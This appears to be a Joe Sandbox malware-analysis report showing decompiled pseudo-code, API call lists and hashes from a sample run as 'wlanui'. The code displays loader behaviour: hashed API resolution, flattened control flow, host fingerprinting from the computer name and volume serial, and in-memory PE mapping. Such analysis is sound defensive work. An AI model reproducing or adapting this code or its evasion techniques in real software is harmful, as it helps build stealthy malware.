                                                        0x00489ed3
                                                        0x00000000
                                                        0x00489e03
                                                        0x00489e03
                                                        0x00489e15
                                                        0x00000000

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000000,?,00000104), ref: 00489E7A
                                                        • QueryFullProcessImageNameW.KERNEL32(00000000), ref: 00489E7D
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$CurrentFullImageNameQuery
                                                        • String ID:
                                                        • API String ID: 2849609825-0
                                                        • Opcode ID: 8e816ee9425203b658c2bfcdac5d81d2845cbb636a6d08459906758e13369013
                                                        • Instruction ID: 8967c6e6db782eef23b370148fc6f8ae7332a78f3974681c6d23057c64b4899f
                                                        • Opcode Fuzzy Hash: 8e816ee9425203b658c2bfcdac5d81d2845cbb636a6d08459906758e13369013
                                                        • Instruction Fuzzy Hash: AB31E471B046145BCB24BF6A98806BF36DA9790B54F180C2FFA15C7390EA78DC05879E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 786 460ad0-460b31 call 460ed0 789 460b47-460b4d 786->789 790 460b33-460b42 786->790 792 460b5f-460b7b 789->792 793 460b4f-460b54 789->793 791 460d40 790->791 795 460b90 792->795 796 460b7d-460b8e 792->796 793->792 797 460b96-460b9c 795->797 796->797 799 460bae-460bca 797->799 800 460b9e-460ba3 797->800 802 460bd7-460c21 VirtualAlloc 799->802 803 460bcc-460bd4 799->803 800->799 807 460c27-460c2e 802->807 808 460d1a-460d24 802->808 803->802 809 460c44-460c4b 807->809 810 460c30-460c3f 807->810 808->791 811 460c5d-460c79 809->811 812 460c4d-460c52 809->812 810->791 814 460c86-460c8d 811->814 815 460c7b-460c83 811->815 812->811 816 460c9f-460cbb 814->816 817 460c8f-460c94 814->817 815->814 819 460cbd-460cc5 816->819 820 460cc8-460cfa VirtualAlloc 816->820 817->816 819->820 823 460d02-460d07 820->823 823->808 824 460d09-460d18 823->824 824->791
                                                        APIs
                                                          • Part of subcall function 00460FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00460F08
                                                          • Part of subcall function 00460FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00460F3E
                                                          • Part of subcall function 00460FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00460F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000), ref: 00460BFF
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335360642.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_460000_wlanui.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$AllocVirtual
                                                        • String ID:
                                                        • API String ID: 1654584625-0
                                                        • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction ID: 4063660d9c9e1e531c79cb0dd43631c043641b0359456a7fcfed946557fc0617
                                                        • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction Fuzzy Hash: 3251C670640218ABDB249F54CE45FEBB778EF54B01F104196FA08B7190E6BC5D85CFAA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 61%
                                                        			E00489B60() {
                                                        				short _v520;
                                                        				void* _v524;
                                                        				void* _v528;
                                                        				char _v532;
                                                        				void* _t11;
                                                        				void* _t13;
                                                        				intOrPtr* _t15;
                                                        				intOrPtr _t21;
                                                        				intOrPtr* _t23;
                                                        				intOrPtr* _t29;
                                                        				intOrPtr _t32;
                                                        				intOrPtr* _t36;
                                                        				intOrPtr* _t39;
                                                        				intOrPtr* _t41;
                                                        				void* _t45;
                                                        				intOrPtr* _t62;
                                                        				intOrPtr _t67;
                                                        				void* _t79;
                                                        				void* _t80;
                                                        				void* _t82;
                                                        
                                                        				_t79 = _v528;
                                                        				_t11 = 0x35499030;
                                                        				while(1) {
                                                        					_t82 = _t11 - 0x2cee787f;
                                                        					if(_t82 > 0) {
                                                        						goto L23;
                                                        					}
                                                        					L2:
                                                        					if(_t82 == 0) {
                                                        						_t21 =  *0x48e550; // 0x2cdcd0
                                                        						_t5 = _t21 + 0x14; // 0x184
                                                        						_v528 =  *_t5;
                                                        						_t23 =  *0x48e228;
                                                        						_v524 = _t79;
                                                        						if(_t23 == 0) {
                                                        							_t23 = E00483E60(_t45, E00483F00(0x9bab0b12), 0x2e50f25, _t80);
                                                        							 *0x48e228 = _t23;
                                                        						}
                                                        						_push(0xffffffff);
                                                        						_push(0);
                                                        						_push( &_v528);
                                                        						_push(2);
                                                        						if( *_t23() == 0) {
                                                        							goto L37;
                                                        						} else {
                                                        							_t11 =  ==  ? 0x66597df : 0x2cee787f;
                                                        							continue;
                                                        						}
                                                        					} else {
                                                        						if(_t11 == 0x66597df) {
                                                        							if(E00489DD0(_t80) == 0) {
                                                        								_t29 =  *0x48e138; // 0x0
                                                        								if(_t29 == 0) {
                                                        									_t29 = E00483E60(_t45, E00483F00(0x9bab0b12), 0xbc7dbdb2, _t80);
                                                        									 *0x48e138 = _t29;
                                                        								}
                                                        								 *_t29(_t79);
                                                        								L18:
                                                        								_t11 = 0x2cee787f;
                                                        							} else {
                                                        								_t62 =  *0x48df98; // 0x0
                                                        								if(_t62 == 0) {
                                                        									_t62 = E00483E60(_t45, E00483F00(0x9bab0b12), 0x6755e68d, _t80);
                                                        									 *0x48df98 = _t62;
                                                        								}
                                                        								_t32 =  *0x48e550; // 0x2cdcd0
                                                        								_t4 = _t32 + 0x14; // 0x184
                                                        								 *_t62( *_t4);
                                                        								_t11 = 0x2044bfa4;
                                                        							}
                                                        							continue;
                                                        						} else {
                                                        							if(_t11 == 0x2044bfa4) {
                                                        								_t36 =  *0x48e464; // 0x0
                                                        								if(_t36 == 0) {
                                                        									_t36 = E00483E60(_t45, E00483F00(0x9bab0b12), 0x29cc148f, _t80);
                                                        									 *0x48e464 = _t36;
                                                        								}
                                                        								 *_t36(_t79);
                                                        								L37:
                                                        								return 0;
                                                        							} else {
                                                        								if(_t11 == 0x26a761c5) {
                                                        									_t39 =  *0x48e3f4;
                                                        									if(_t39 == 0) {
                                                        										_t39 = E00483E60(_t45, E00483F00(0x9bab0b12), 0x7dc9b9bb, _t80);
                                                        										 *0x48e3f4 = _t39;
                                                        									}
                                                        									 *_t39(0,  &_v520, 0x104);
                                                        									_t41 =  *0x48de18;
                                                        									if(_t41 == 0) {
                                                        										_t41 = E00483E60(_t45, E00483F00(0x55ab7d30), 0x49c1cb87, _t80);
                                                        										 *0x48de18 = _t41;
                                                        									}
                                                        									 *((short*)( *_t41( &_v532))) = 0;
                                                        									_t11 = 0x3036867a;
                                                        									continue;
                                                        									do {
                                                        										while(1) {
                                                        											_t82 = _t11 - 0x2cee787f;
                                                        											if(_t82 > 0) {
                                                        												goto L23;
                                                        											}
                                                        											goto L2;
                                                        										}
                                                        										goto L23;
                                                        									} while (_t11 != 0x1b22f57c);
                                                        									return 0;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					L38:
                                                        					L23:
                                                        					if(_t11 == 0x3036867a) {
                                                        						if( *0x48dd3c == 0) {
                                                        							 *0x48dd3c = E00483E60(_t45, E00483F00(0x9bab0b12), 0x4f6e1bf0, _t80);
                                                        						}
                                                        						_t13 = FindFirstChangeNotificationW( &_v520, 0, 1); // executed
                                                        						_t79 = _t13;
                                                        						if(E00489DD0(_t80) == 0) {
                                                        							goto L18;
                                                        						} else {
                                                        							_t15 =  *0x48df98; // 0x0
                                                        							if(_t15 == 0) {
                                                        								_t15 = E00483E60(_t45, E00483F00(0x9bab0b12), 0x6755e68d, _t80);
                                                        								 *0x48df98 = _t15;
                                                        							}
                                                        							_t67 =  *0x48e550; // 0x2cdcd0
                                                        							_t10 = _t67 + 0x14; // 0x184
                                                        							 *_t15( *_t10);
                                                        							_t11 = 0x2044bfa4;
                                                        						}
                                                        						continue;
                                                        					} else {
                                                        						if(_t11 != 0x35499030) {
                                                        							goto L26;
                                                        						} else {
                                                        							_t11 = 0x26a761c5;
                                                        							continue;
                                                        						}
                                                        					}
                                                        					goto L38;
                                                        				}
                                                        			}























                                                        0x00489b67
                                                        0x00489b6b
                                                        0x00489b80
                                                        0x00489b80
                                                        0x00489b85
                                                        0x00000000
                                                        0x00000000
                                                        0x00489b8b
                                                        0x00489b8b
                                                        0x00489c94
                                                        0x00489c99
                                                        0x00489c9c
                                                        0x00489ca0
                                                        0x00489ca5
                                                        0x00489cab
                                                        0x00489cbe
                                                        0x00489cc3
                                                        0x00489cc3
                                                        0x00489cc8
                                                        0x00489cca
                                                        0x00489cd0
                                                        0x00489cd1
                                                        0x00489cd9
                                                        0x00000000
                                                        0x00489cdf
                                                        0x00489ce7
                                                        0x00000000
                                                        0x00489ce7
                                                        0x00489b91
                                                        0x00489b96
                                                        0x00489c25
                                                        0x00489c63
                                                        0x00489c6a
                                                        0x00489c7d
                                                        0x00489c82
                                                        0x00489c82
                                                        0x00489c88
                                                        0x00489c8a
                                                        0x00489c8a
                                                        0x00489c27
                                                        0x00489c27
                                                        0x00489c2f
                                                        0x00489c47
                                                        0x00489c49
                                                        0x00489c49
                                                        0x00489c4f
                                                        0x00489c54
                                                        0x00489c57
                                                        0x00489c59
                                                        0x00489c59
                                                        0x00000000
                                                        0x00489b9c
                                                        0x00489ba1
                                                        0x00489d96
                                                        0x00489d9d
                                                        0x00489db0
                                                        0x00489db5
                                                        0x00489db5
                                                        0x00489dbb
                                                        0x00489dbe
                                                        0x00489dc7
                                                        0x00489ba7
                                                        0x00489bac
                                                        0x00489bb2
                                                        0x00489bb9
                                                        0x00489bcc
                                                        0x00489bd1
                                                        0x00489bd1
                                                        0x00489be2
                                                        0x00489be4
                                                        0x00489beb
                                                        0x00489bfe
                                                        0x00489c03
                                                        0x00489c03
                                                        0x00489c11
                                                        0x00489c14
                                                        0x00489c19
                                                        0x00489b80
                                                        0x00489b80
                                                        0x00489b80
                                                        0x00489b85
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00489b85
                                                        0x00000000
                                                        0x00489b80
                                                        0x00489d1c
                                                        0x00489d1c
                                                        0x00489bac
                                                        0x00489ba1
                                                        0x00489b96
                                                        0x00000000
                                                        0x00489cef
                                                        0x00489cf4
                                                        0x00489d26
                                                        0x00489d3e
                                                        0x00489d3e
                                                        0x00489d4c
                                                        0x00489d4e
                                                        0x00489d57
                                                        0x00000000
                                                        0x00489d5d
                                                        0x00489d5d
                                                        0x00489d64
                                                        0x00489d77
                                                        0x00489d7c
                                                        0x00489d7c
                                                        0x00489d81
                                                        0x00489d87
                                                        0x00489d8a
                                                        0x00489d8c
                                                        0x00489d8c
                                                        0x00000000
                                                        0x00489cf6
                                                        0x00489cfb
                                                        0x00000000
                                                        0x00489cfd
                                                        0x00489cfd
                                                        0x00000000
                                                        0x00489cfd
                                                        0x00489cfb
                                                        0x00000000
                                                        0x00489cf4

                                                        APIs
                                                        • FindFirstChangeNotificationW.KERNEL32(?,00000000,00000001), ref: 00489D4C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ChangeFindFirstNotification
                                                        • String ID:
                                                        • API String ID: 1065410024-0
                                                        • Opcode ID: 0cac711ed67db22516533188bb871a4c5a3800ea606c1280289f8de3469bdeb6
                                                        • Instruction ID: 76e8ad930bbd05d06f9a58c2aa95da010df5905c698810455ad1ea6837bbe048
                                                        • Opcode Fuzzy Hash: 0cac711ed67db22516533188bb871a4c5a3800ea606c1280289f8de3469bdeb6
                                                        • Instruction Fuzzy Hash: ED51C8307046005BDB18BF6AD89167F26E6ABA4758B140C2FF606CB391FA38DC01D79E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 73%
                                                        			E00486060(void* __ecx, void* __edx, void* __ebp) {
                                                        				char _v16;
                                                        				long _v20;
                                                        				void* __ebx;
                                                        				void* _t10;
                                                        				int _t13;
                                                        				intOrPtr* _t17;
                                                        				void* _t18;
                                                        				intOrPtr* _t19;
                                                        				intOrPtr* _t21;
                                                        				char _t27;
                                                        				void* _t28;
                                                        				void* _t29;
                                                        				signed int _t31;
                                                        				char* _t45;
                                                        				void* _t51;
                                                        				void* _t52;
                                                        				void* _t54;
                                                        				void* _t59;
                                                        
                                                        				_t56 = __ebp;
                                                        				_t51 = __ecx;
                                                        				_v20 = 0x10;
                                                        				_t29 = E00485500(_t28, __ebp);
                                                        				_t10 = 0x2ffbd16a;
                                                        				while(1) {
                                                        					L1:
                                                        					_t59 = _t10 - 0x1d42a4ce;
                                                        					if(_t59 > 0) {
                                                        						break;
                                                        					}
                                                        					if(_t59 == 0) {
                                                        						if( *0x48dc7c == 0) {
                                                        							 *0x48dc7c = E00483E60(_t29, E00483F00(0x9bab0b12), 0xf02a6b30, _t56);
                                                        						}
                                                        						_t13 = GetComputerNameA( &_v16,  &_v20); // executed
                                                        						if(_t13 == 0) {
                                                        							goto L23;
                                                        						} else {
                                                        							_t10 = 0x19fdc91a;
                                                        							continue;
                                                        						}
                                                        					} else {
                                                        						if(_t10 == 0x141a6c5f) {
                                                        							_t54 = E004835C0(0x48d2f0);
                                                        							_t17 =  *0x48dc98;
                                                        							if(_t17 == 0) {
                                                        								_t17 = E00483E60(_t29, E00483F00(0xc6fbcd74), 0xe71324c6, _t56);
                                                        								 *0x48dc98 = _t17;
                                                        							}
                                                        							_t18 =  *_t17(_t51, 0x19, _t54,  &_v16, _t29);
                                                        							_t19 =  *0x48e494;
                                                        							_t31 = 0 | _t18 > 0x00000000;
                                                        							if(_t19 == 0) {
                                                        								_t19 = E00483E60(_t31, E00483F00(0x9bab0b12), 0x7facde30, _t56);
                                                        								 *0x48e494 = _t19;
                                                        							}
                                                        							_t52 =  *_t19();
                                                        							_t21 =  *0x48df30;
                                                        							if(_t21 == 0) {
                                                        								_t21 = E00483E60(_t31, E00483F00(0x9bab0b12), 0x5010a54d, _t56);
                                                        								 *0x48df30 = _t21;
                                                        							}
                                                        							 *_t21(_t52, 0, _t54);
                                                        							return _t31;
                                                        						} else {
                                                        							if(_t10 != 0x19fdc91a) {
                                                        								L22:
                                                        								if(_t10 != 0x109d9459) {
                                                        									continue;
                                                        								} else {
                                                        									L23:
                                                        									return 0;
                                                        								}
                                                        							} else {
                                                        								_t45 =  &_v16;
                                                        								if(_v16 != 0) {
                                                        									do {
                                                        										_t27 =  *_t45;
                                                        										if(_t27 < 0x30 || _t27 > 0x39) {
                                                        											if(_t27 < 0x61 || _t27 > 0x7a) {
                                                        												if(_t27 < 0x41 || _t27 > 0x5a) {
                                                        													 *_t45 = 0x58;
                                                        												}
                                                        											}
                                                        										}
                                                        										_t45 = _t45 + 1;
                                                        									} while ( *_t45 != 0);
                                                        								}
                                                        								_t10 = 0x141a6c5f;
                                                        								continue;
                                                        							}
                                                        						}
                                                        					}
                                                        					L31:
                                                        				}
                                                        				if(_t10 != 0x2ffbd16a) {
                                                        					goto L22;
                                                        				} else {
                                                        					_t10 = 0x1d42a4ce;
                                                        					goto L1;
                                                        				}
                                                        				goto L31;
                                                        			}





















                                                        0x00486060
                                                        0x00486065
                                                        0x00486067
                                                        0x00486074
                                                        0x00486076
                                                        0x00486080
                                                        0x00486080
                                                        0x00486080
                                                        0x00486085
                                                        0x00000000
                                                        0x00000000
                                                        0x0048608b
                                                        0x004860e1
                                                        0x004860f9
                                                        0x004860f9
                                                        0x00486108
                                                        0x0048610c
                                                        0x00000000
                                                        0x0048610e
                                                        0x0048610e
                                                        0x00000000
                                                        0x0048610e
                                                        0x0048608d
                                                        0x00486092
                                                        0x00486147
                                                        0x00486149
                                                        0x00486150
                                                        0x00486163
                                                        0x00486168
                                                        0x00486168
                                                        0x00486177
                                                        0x00486180
                                                        0x00486185
                                                        0x0048618a
                                                        0x0048619d
                                                        0x004861a2
                                                        0x004861a2
                                                        0x004861a9
                                                        0x004861ab
                                                        0x004861b2
                                                        0x004861c5
                                                        0x004861ca
                                                        0x004861ca
                                                        0x004861d3
                                                        0x004861dd
                                                        0x00486098
                                                        0x0048609d
                                                        0x00486129
                                                        0x0048612e
                                                        0x00000000
                                                        0x00486135
                                                        0x00486135
                                                        0x0048613b
                                                        0x0048613b
                                                        0x004860a3
                                                        0x004860a8
                                                        0x004860ac
                                                        0x004860b0
                                                        0x004860b0
                                                        0x004860b4
                                                        0x004860bc
                                                        0x004860c4
                                                        0x004860ca
                                                        0x004860ca
                                                        0x004860c4
                                                        0x004860bc
                                                        0x004860cd
                                                        0x004860ce
                                                        0x004860b0
                                                        0x004860d3
                                                        0x00000000
                                                        0x004860d3
                                                        0x0048609d
                                                        0x00486092
                                                        0x00000000
                                                        0x0048608b
                                                        0x0048611d
                                                        0x00000000
                                                        0x0048611f
                                                        0x0048611f
                                                        0x00000000
                                                        0x0048611f
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 00485500: GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004855A1
                                                        • GetComputerNameA.KERNEL32(?,00000010), ref: 00486108
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ComputerInformationNameVolume
                                                        • String ID:
                                                        • API String ID: 2991138825-0
                                                        • Opcode ID: d6415ef3250141e5f200ffaddb6cfee45f4f773879014663eac205b6b7ade1f0
                                                        • Instruction ID: 1e0972577e40e1be14c69a85c2daf8baaffd991a4ded65291cfbb95e2c05c82e
                                                        • Opcode Fuzzy Hash: d6415ef3250141e5f200ffaddb6cfee45f4f773879014663eac205b6b7ade1f0
                                                        • Instruction Fuzzy Hash: DE3105307042011ADB64FB7E8C5576F26869B92B08F514C2FE54ACB396EE2CCC06875F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 68%
                                                        			E00489F30(void* __ebx) {
                                                        				void* _t7;
                                                        				intOrPtr* _t8;
                                                        				intOrPtr _t9;
                                                        				intOrPtr* _t11;
                                                        				intOrPtr* _t13;
                                                        				void* _t20;
                                                        				void* _t25;
                                                        				intOrPtr _t27;
                                                        				void* _t40;
                                                        				void* _t41;
                                                        
                                                        				_t25 = __ebx;
                                                        				_t7 = 0x11b28d96;
                                                        				L1:
                                                        				while(_t7 != 0xce4fa38) {
                                                        					if(_t7 == 0x11b28d96) {
                                                        						_t11 =  *0x48e494;
                                                        						if(_t11 == 0) {
                                                        							_t11 = E00483E60(_t25, E00483F00(0x9bab0b12), 0x7facde30, _t41);
                                                        							 *0x48e494 = _t11;
                                                        						}
                                                        						_t40 =  *_t11();
                                                        						_t13 =  *0x48dd18;
                                                        						if(_t13 == 0) {
                                                        							_t13 = E00483E60(_t25, E00483F00(0x9bab0b12), 0x9ff0609c, _t41);
                                                        							 *0x48dd18 = _t13;
                                                        						}
                                                        						_t27 =  *_t13(_t40, 8, 0x20);
                                                        						 *0x48e550 = _t27;
                                                        						if(_t27 == 0) {
                                                        							goto L18;
                                                        						} else {
                                                        							_t7 = 0xce4fa38;
                                                        							continue;
                                                        						}
                                                        					} else {
                                                        						if(_t7 == 0x33fbe40a) {
                                                        							if( *0x48de50 == 0) {
                                                        								 *0x48de50 = E00483E60(_t25, E00483F00(0x9bab0b12), 0x676edf3, _t41);
                                                        							}
                                                        							_t20 = CreateThread(0, 0, E00489B60, 0, 0, 0);
                                                        							_t27 =  *0x48e550; // 0x2cdcd0
                                                        							 *(_t27 + 0x18) = _t20;
                                                        							L18:
                                                        							return 0 | _t27 != 0x00000000;
                                                        						} else {
                                                        							if(_t7 != 0x1dffa4f5) {
                                                        								continue;
                                                        							} else {
                                                        								return 0 | _t27 != 0x00000000;
                                                        							}
                                                        						}
                                                        					}
                                                        				}
                                                        				_t8 =  *0x48de6c;
                                                        				if(_t8 == 0) {
                                                        					_t8 = E00483E60(_t25, E00483F00(0x9bab0b12), 0x747563ac, _t41);
                                                        					 *0x48de6c = _t8;
                                                        				}
                                                        				_t9 =  *_t8(0, 0, 0, 0);
                                                        				_t27 =  *0x48e550; // 0x2cdcd0
                                                        				 *((intOrPtr*)(_t27 + 0x14)) = _t9;
                                                        				_t7 = 0x33fbe40a;
                                                        				goto L1;
                                                        			}













                                                        0x00489f30
                                                        0x00489f36
                                                        0x00000000
                                                        0x00489f40
                                                        0x00489f50
                                                        0x00489f6d
                                                        0x00489f74
                                                        0x00489f87
                                                        0x00489f8c
                                                        0x00489f8c
                                                        0x00489f93
                                                        0x00489f95
                                                        0x00489f9c
                                                        0x00489faf
                                                        0x00489fb4
                                                        0x00489fb4
                                                        0x00489fc0
                                                        0x00489fc2
                                                        0x00489fca
                                                        0x00000000
                                                        0x00489fd0
                                                        0x00489fd0
                                                        0x00000000
                                                        0x00489fd0
                                                        0x00489f52
                                                        0x00489f57
                                                        0x0048a022
                                                        0x0048a03a
                                                        0x0048a03a
                                                        0x0048a04e
                                                        0x0048a050
                                                        0x0048a056
                                                        0x0048a059
                                                        0x0048a061
                                                        0x00489f5d
                                                        0x00489f62
                                                        0x00000000
                                                        0x00489f64
                                                        0x00489f6c
                                                        0x00489f6c
                                                        0x00489f62
                                                        0x00489f57
                                                        0x00489f50
                                                        0x00489fda
                                                        0x00489fe1
                                                        0x00489ff4
                                                        0x00489ff9
                                                        0x00489ff9
                                                        0x0048a006
                                                        0x0048a008
                                                        0x0048a00e
                                                        0x0048a011
                                                        0x00000000

                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,00000000,00489B60,00000000,00000000,00000000), ref: 0048A04E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: f06db884963f80ccb0a61605dc1bbc2190778b44f5d6f961512fb2422e02db27
                                                        • Instruction ID: 76e7b45f46782725c81a830be69299acd1363725dd49175358106c3fe6418746
                                                        • Opcode Fuzzy Hash: f06db884963f80ccb0a61605dc1bbc2190778b44f5d6f961512fb2422e02db27
                                                        • Instruction Fuzzy Hash: E7214130B047019BEB28BF6A9C5173E22969B51B48F240C2EB705DF3E5FA65DD01978E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 58%
                                                        			E00485C00(void* __ecx, void* __edx, void* __ebp) {
                                                        				intOrPtr _v0;
                                                        				intOrPtr _v4;
                                                        				void* __ebx;
                                                        				intOrPtr* _t3;
                                                        				void* _t6;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr* _t11;
                                                        				void* _t19;
                                                        				void* _t20;
                                                        				void* _t37;
                                                        				void* _t38;
                                                        				void* _t39;
                                                        				void* _t40;
                                                        
                                                        				_t41 = __ebp;
                                                        				_t3 =  *0x48e494;
                                                        				_t19 = __ecx;
                                                        				_t37 = __edx;
                                                        				if(_t3 == 0) {
                                                        					_t3 = E00483E60(__ecx, E00483F00(0x9bab0b12), 0x7facde30, __ebp);
                                                        					 *0x48e494 = _t3;
                                                        				}
                                                        				_t39 =  *_t3();
                                                        				if( *0x48dd18 == 0) {
                                                        					 *0x48dd18 = E00483E60(_t19, E00483F00(0x9bab0b12), 0x9ff0609c, _t41);
                                                        				}
                                                        				_t6 = RtlAllocateHeap(_t39, 8, 0x40000); // executed
                                                        				_t40 = _t6;
                                                        				if(_t40 == 0) {
                                                        					return 0;
                                                        				} else {
                                                        					_push(_t40);
                                                        					_push(_v0);
                                                        					_push(_v4);
                                                        					_t20 = E004858C0(_t19, _t37);
                                                        					_t9 =  *0x48e494;
                                                        					if(_t9 == 0) {
                                                        						_t9 = E00483E60(_t20, E00483F00(0x9bab0b12), 0x7facde30, _t41);
                                                        						 *0x48e494 = _t9;
                                                        					}
                                                        					_t38 =  *_t9();
                                                        					_t11 =  *0x48df30;
                                                        					if(_t11 == 0) {
                                                        						_t11 = E00483E60(_t20, E00483F00(0x9bab0b12), 0x5010a54d, _t41);
                                                        						 *0x48df30 = _t11;
                                                        					}
                                                        					 *_t11(_t38, 0, _t40);
                                                        					return _t20;
                                                        				}
                                                        			}
















                                                        0x00485c00
                                                        0x00485c00
                                                        0x00485c06
                                                        0x00485c0a
                                                        0x00485c0e
                                                        0x00485c21
                                                        0x00485c26
                                                        0x00485c26
                                                        0x00485c2d
                                                        0x00485c36
                                                        0x00485c4e
                                                        0x00485c4e
                                                        0x00485c5b
                                                        0x00485c5d
                                                        0x00485c61
                                                        0x00485cd7
                                                        0x00485c63
                                                        0x00485c63
                                                        0x00485c64
                                                        0x00485c6c
                                                        0x00485c75
                                                        0x00485c7a
                                                        0x00485c81
                                                        0x00485c94
                                                        0x00485c99
                                                        0x00485c99
                                                        0x00485ca0
                                                        0x00485ca2
                                                        0x00485ca9
                                                        0x00485cbc
                                                        0x00485cc1
                                                        0x00485cc1
                                                        0x00485cca
                                                        0x00485cd1
                                                        0x00485cd1

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,00040000), ref: 00485C5B
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 9d9828802982fc29f890c1f0c2e5832dfcd17e7ff5603c86e8d29114bed266de
                                                        • Instruction ID: e4dbb33bb33f01ee576329c050e09b39d958c16aa7eb0376fdc92d522de6d8c4
                                                        • Opcode Fuzzy Hash: 9d9828802982fc29f890c1f0c2e5832dfcd17e7ff5603c86e8d29114bed266de
                                                        • Instruction Fuzzy Hash: 59117C30B117111BDB14BFBE9C5162F2ADB9FE0A59B100C3EB609CB366EA28CD01579D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 68%
                                                        			E00485500(void* __ebx, void* __ebp) {
                                                        				char _v520;
                                                        				short _v528;
                                                        				long _v532;
                                                        				intOrPtr* _t7;
                                                        				short* _t10;
                                                        				WCHAR** _t28;
                                                        
                                                        				_t27 = __ebp;
                                                        				_t16 = __ebx;
                                                        				_t7 =  *0x48e084;
                                                        				 *_t28 = 0;
                                                        				if(_t7 == 0) {
                                                        					_t7 = E00483E60(__ebx, E00483F00(0x9bab0b12), 0x176c3a02, __ebp);
                                                        					 *0x48e084 = _t7;
                                                        				}
                                                        				_push(0x104);
                                                        				_push( &_v520);
                                                        				if( *_t7() != 0) {
                                                        					_t10 =  &_v528;
                                                        					if(_v528 != 0) {
                                                        						while( *_t10 != 0x5c) {
                                                        							_t10 = _t10 + 2;
                                                        							if( *_t10 != 0) {
                                                        								continue;
                                                        							} else {
                                                        							}
                                                        							goto L9;
                                                        						}
                                                        						 *((short*)(_t10 + 2)) = 0;
                                                        					}
                                                        					L9:
                                                        					if( *0x48e098 == 0) {
                                                        						 *0x48e098 = E00483E60(_t16, E00483F00(0x9bab0b12), 0xfee49d4e, _t27);
                                                        					}
                                                        					GetVolumeInformationW( &_v528, 0, 0,  &_v532, 0, 0, 0, 0); // executed
                                                        				}
                                                        				return _v532;
                                                        			}









                                                        0x00485500
                                                        0x00485500
                                                        0x00485506
                                                        0x0048550b
                                                        0x00485514
                                                        0x00485527
                                                        0x0048552c
